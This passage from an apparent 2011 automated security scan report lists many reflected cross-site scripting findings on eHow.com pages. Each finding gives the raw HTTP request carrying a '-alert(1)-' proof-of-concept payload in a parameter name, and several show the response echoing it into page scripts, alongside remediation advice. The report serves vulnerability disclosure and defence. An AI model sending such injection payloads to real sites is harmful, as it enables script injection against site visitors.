GET /topic_4127_home-alarm-system-guide.html?8563f'-alert(1)-'3de31e10d00=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.435. http://www.ehow.com/topic_429_all-flu.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_429_all-flu.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dac08'-alert(1)-'b2e662a550c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_429_all-flu.html?dac08'-alert(1)-'b2e662a550c=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:03 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=429; expires=Thu, 02-Feb-2012 15:17:03 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44805
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> All About the Flu - Avoid the Flu | eHow.com < ...[SNIP]... <fb:like href="http://www.ehow.com/topic_429_all-flu.html?dac08'-alert(1)-'b2e662a550c=1" ref="like" width="300"> ...[SNIP]...
1.436. http://www.ehow.com/topic_4989_photo-sharing-101.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_4989_photo-sharing-101.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac526'-alert(1)-'86e037a2e87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4989_photo-sharing-101.html?ac526'-alert(1)-'86e037a2e87=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.437. http://www.ehow.com/topic_49_treating-colds-flus.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_49_treating-colds-flus.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 931c2'-alert(1)-'c447544e077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_49_treating-colds-flus.html?931c2'-alert(1)-'c447544e077=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:03 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=49; expires=Thu, 02-Feb-2012 15:17:03 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37719
1.438. http://www.ehow.com/topic_5023_jog-lose-weight.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_5023_jog-lose-weight.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7d7a'-alert(1)-'6dddcb2ebd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_5023_jog-lose-weight.html?c7d7a'-alert(1)-'6dddcb2ebd7=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.439. http://www.ehow.com/topic_689_black-white-photos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_689_black-white-photos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90ac0'-alert(1)-'2a391c92f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_689_black-white-photos.html?90ac0'-alert(1)-'2a391c92f95=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:44 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=689; expires=Thu, 02-Feb-2012 15:16:44 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 53488
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Take Black and White Photos - Taking Black and ...[SNIP]... <fb:like href="http://www.ehow.com/topic_689_black-white-photos.html?90ac0'-alert(1)-'2a391c92f95=1" ref="like" width="300"> ...[SNIP]...
1.440. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_745_capture-enduring-wedding-photos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc70b'-alert(1)-'a88873815ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_745_capture-enduring-wedding-photos.html?cc70b'-alert(1)-'a88873815ce=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:45 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=745; expires=Thu, 02-Feb-2012 15:16:45 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39751
1.441. http://www.ehow.com/topic_7853_floor-fountains-guide.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_7853_floor-fountains-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 520f6'-alert(1)-'466f9c19c1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7853_floor-fountains-guide.html?520f6'-alert(1)-'466f9c19c1c=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.442. http://www.ehow.com/topic_7992_floor-water-fountains-101.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_7992_floor-water-fountains-101.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1b74'-alert(1)-'1bd517eadfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7992_floor-water-fountains-101.html?f1b74'-alert(1)-'1bd517eadfe=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:26 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=7992; expires=Thu, 02-Feb-2012 15:16:26 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 38098
1.443. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_8016_outdoor-garden-fountains-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75e9c'-alert(1)-'b6eca6d525c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8016_outdoor-garden-fountains-guide.html?75e9c'-alert(1)-'b6eca6d525c=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.444. http://www.ehow.com/topic_8047_water-garden-fountains-101.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_8047_water-garden-fountains-101.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fda0'-alert(1)-'099222e590f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8047_water-garden-fountains-101.html?5fda0'-alert(1)-'099222e590f=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.445. http://www.ehow.com/toys-and-games/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/toys-and-games/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2468c'-alert(1)-'bd803265f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toys-and-games/?2468c'-alert(1)-'bd803265f69=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:14 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72358
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Toys & Games - How To Information | eHow.com</tit ...[SNIP]... <fb:like href="http://www.ehow.com/toys-and-games/?2468c'-alert(1)-'bd803265f69=1" ref="like" width="300"> ...[SNIP]...
1.446. http://www.ehow.com/us-travel/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/us-travel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d2a7'-alert(1)-'c41efa4ef38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /us-travel/?9d2a7'-alert(1)-'c41efa4ef38=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:16 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74677
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>US Travel - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/us-travel/?9d2a7'-alert(1)-'c41efa4ef38=1" ref="like" width="300"> ...[SNIP]...
1.447. http://www.ehow.com/vacations-and-travel-planning/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/vacations-and-travel-planning/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b79c'-alert(1)-'5e746d16608 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vacations-and-travel-planning/?2b79c'-alert(1)-'5e746d16608=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:16 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75294
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Vacations & Travel Planning - How To Information ...[SNIP]... <fb:like href="http://www.ehow.com/vacations-and-travel-planning/?2b79c'-alert(1)-'5e746d16608=1" ref="like" width="300"> ...[SNIP]...
1.448. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/video_6598099_make-sugar-spice-scrub.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df61'-alert(1)-'9bca15399b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6598099_make-sugar-spice-scrub.html?3df61'-alert(1)-'9bca15399b4=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:51 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83575
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Sugar & Spice Scrub: Gorgeously Gre ...[SNIP]... 6682/flash/36cbefe4-4d7a-49a0-b6a2-b38d82d69318.flv', cp: '', pid: '', demand_playlistid: '', from_url: 'http%3a%2f%2fwww.ehow.com%2fvideo_6598099_make-sugar-spice-scrub.html%3f3df61'-alert(1)-'9bca15399b4%3d1' },vars||{});
var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC"); videoSWFObject.addParam("allowScriptAccess", " ...[SNIP]...
1.449. http://www.ehow.com/video_6976779_sensational-snacks.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/video_6976779_sensational-snacks.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50c27'-alert(1)-'7bea5207a21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6976779_sensational-snacks.html?50c27'-alert(1)-'7bea5207a21=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:48 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74883
var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC"); videoSWFObject.addParam("allowScriptAccess", " ...[SNIP]...
1.450. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/video_7199214_onion-flatbread-recipe.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe44'-alert(1)-'7efe9cc39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_7199214_onion-flatbread-recipe.html?abe44'-alert(1)-'7efe9cc39a0=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:50 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 85016
var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC"); videoSWFObject.addParam("allowScriptAccess", " ...[SNIP]...
1.451. http://www.ehow.com/weddings-and-parties/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/weddings-and-parties/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de308'-alert(1)-'4a8b2e9f3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weddings-and-parties/?de308'-alert(1)-'4a8b2e9f3c2=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:15 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71835
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weddings & Parties - How To Information | eHow.co ...[SNIP]... <fb:like href="http://www.ehow.com/weddings-and-parties/?de308'-alert(1)-'4a8b2e9f3c2=1" ref="like" width="300"> ...[SNIP]...
1.452. http://www.ehow.com/weight-management-and-body-image/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/weight-management-and-body-image/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2da39'-alert(1)-'64118fe1441 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
